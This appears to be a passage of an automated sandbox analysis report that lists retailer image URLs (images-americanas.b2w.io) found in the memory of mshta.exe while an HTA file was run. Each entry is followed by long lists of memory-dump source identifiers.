https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-papelaria-a64647ae2a59.png
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12516007368.000000000968A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-papelaria-a64647ae2a59.png#G
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508002013.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.000000000970F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542078121.0000000009722000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510409430.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-papelaria-a64647ae2a59.pngB
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558057036.000000000A990000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515721910.00000000095EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574215733.00000000095EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555895561.0000000009681000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541646516.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000717E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503863617.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575002147.0000000009682000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510777921.00000000096F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/01/atalhos-suplementos-vitaminas-2e13c2882cd2.p
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559679419.0000000009651000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555748992.0000000009654000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12549952415.00000000096FE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511626967.0000000009653000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12557355182.000000000964E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541646516.00000000096FE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2023/12/15/403398377_1344107672905432_87087219184302511
Source: mshta.exe, 00000001.00000002.12573257257.00000000071EE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476917158.000000000C131000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.00000000071ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509642076.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492287014.00000000071D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12499023095.0000000002EA0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000717E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12567402670.000000000C140000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/05/02/250x260-atalho-app-mais-barato-no-app-129882
Source: mshta.exe, 00000001.00000003.12554972564.0000000009724000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575317065.0000000009728000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/06/12/atalhos-esporte-fitness-e-lazer-5b7f21
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12575370862.000000000972E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.00000000071ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542448350.000000000972E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492287014.00000000071D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000717E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508002013.0000000009713000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574609531.000000000962B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/06/12/atalhos-esporte-fitness-e-lazer-5b7f212400c3
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12402284245.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511302966.00000000096F1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12462713387.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12402767156.0000000006A2F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542545061.000000000963F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/06/25/DESK_APP-ATL-SERVICO-GIFTCARD-9f3f630fb4f0-4
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555668791.0000000002F02000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503081399.000000000AA8B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510309350.00000000071B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000717E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502944893.00000000071B0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA8A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570396269.0000000002F04000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/07/04/baixeapp-qr_desk-1-140b56c95cd2.png
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509850041.0000000009698000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510847946.00000000096C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/07/04/baixeapp-qr_desk-1-140b56c95cd2.png%
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555748992.0000000009654000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511626967.0000000009653000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509895012.0000000009640000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12559679419.0000000009654000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12566992649.0000000009654000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/07/04/baixeapp-qr_desk-1-140b56c95cd2.png9.png
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511594079.000000000963C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/07/04/baixeapp-qr_desk-1-140b56c95cd2.pnga
Source: mshta.exe, 00000001.00000003.12478964255.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12516007368.000000000968A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/07/04/baixeapp-qr_desk-1-140b56c95cd2.pngg
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12555668791.0000000002F02000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095F7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12550895184.000000000960B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000960A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396431182.0000000006A00000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12397099421.000000000DB30000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492554371.000000000BEF6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000095FB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496435383.0000000002EFF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574416086.000000000960B000.00000004.00000020.00020000.00000000.sdmp, Archivo-PxFkiLTWYG-23122024095010.htaString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/08/05/bn-tt_mercado-1-b820f7d67f0c.png
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492072081.000000000A9F3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515721910.00000000095EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577998320.000000000AB6F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12556795217.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475198378.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12541089145.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515936118.000000000AB69000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475706926.000000000BEC8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12558604615.000000000720C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/08/05/bn-tt_mercado-e904efa9812b.png
Source: mshta.exe, 00000001.00000003.12396857850.000000000DA98000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577918644.000000000AB5B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509384643.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12515721910.00000000095EB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511435902.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574215733.00000000095EC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000095E7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500012535.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12494876647.00000000095E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570171888.0000000002EB6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502602065.000000000AB3A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12502127839.0000000002E60000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509600990.000000000AB5A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396321045.0000000006A1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475450040.000000000BE9B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12570396269.0000000002F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/10/14/topinho-desk-app-0daad7b9295c-011ca42e3f6b.w
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12504149097.000000000A97E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12476802563.000000000AA43000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542545061.0000000009641000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12507753981.000000000BEF7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12508874148.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12505060400.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12577325605.000000000A988000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12475964347.000000000BEF0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12511657871.000000000A987000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12573384336.000000000720C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12506436886.000000000968A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492174257.000000000AA49000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.0000000009679000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12396115872.00000000069D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/10/16/MACROSSHome2-432x540px-cb8bf5b6c936.png
Source: mshta.exe, 00000001.00000003.12476100216.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12510579156.0000000009701000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12503196955.00000000096ED000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509182023.00000000096FC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.00000000096ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://images-americanas.b2w.io/spacey/acom/2024/10/16/MACROSSHome2-432x540px-cb8bf5b6c936.png-Y
Source: mshta.exe, 00000001.00000003.12494876647.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12542545061.0000000009641000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12496581245.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12495682356.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12492777250.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12477881373.000000000961C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000002.12574697469.0000000009641000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12509895012.0000000009640000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000001.00000003.12500895318.000000000962A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 